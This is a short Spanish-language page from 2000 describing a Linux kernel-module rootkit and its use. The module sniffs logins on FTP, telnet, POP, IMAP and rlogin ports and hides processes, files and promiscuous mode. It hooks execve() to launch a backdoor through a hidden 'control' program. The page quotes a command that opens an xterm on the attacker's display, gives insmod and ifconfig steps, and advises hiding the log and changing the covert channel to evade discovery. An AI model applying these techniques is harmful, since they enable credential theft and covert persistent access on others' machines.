LiNUX KERNEL MODULES: LKMs

Características del módulo:

El módulo puede compilar en kernels 2.2.x o 2.0.x. Para compilarlo para uno u otro: make K22 o make K20. Si lo compilas para el 2.2.x también te compila el módulo hider. Junto con el módulo esta el código fuente de un programa llamado control que sirve para ejecutar (backdoor) algún programa ocultándolo, o bien para ocultar algún proceso o fichero.

Para comunicarse con el módulo manda un paquete IP con el campo protocol a 128, y los datos están encriptados (un simple XOR) para evitar que algún monitor de paquetes vea que por su red circulan paquetes con los datos: "/usr/X11R6/bin/xterm -display hacker:0.0 -ut -e /bin/tcsh". Seria bastante sospechoso ¿no? :). También es un sniffer, que escucha conexiones en los puertos 21, 23, 109,110, 143 y 513.

Las conexiones se "loguean" el fichero LOG_FILE, que por defecto es "/tmp/.mis_logs_33137". Os recomiendo que lo cambiéis, y que nada mas instalarlo ocultéis el archivo con el programa control.

Si lo compilas para el kernel 2.0.x no hace falta que insertes el módulo hider, pero en el 2.2.x si hace falta. El programa control es muy cutre, y seguro que mas de un script kiddie no sabe usarlo (mejor ;) ). Lo que hace el backdoor es cambiar la primera llamada que se hace a execve() para ejecutar nuestro backdoor, asi que el programa control se conecta al puerto telnet para que se ejecute el telnetd, ya que si el root (por ejemplo) hace un ls y no le sale nada, o peor, le dice que el xterm no puede abrir el display hacker:0.0 seria muy sospechoso. El módulo también oculta el flag del modo promiscuo, pero no lo pone. Para ponerlo:

#insmod modsniff.o #insmod hider.o error: dispositivo o recurso ocupado (logico)
#ifconfig eth0 promisc #ifconfig eth0 -promisc

Y ya está. Tened cuidado, y cambiar lo de la forma de comunicarse con el módulo, porque si no lo cambiáis, haciendo un broadcast con un paquete de ese tipo os podrían descubrir.

Anterior

(c) 2000 KIKO81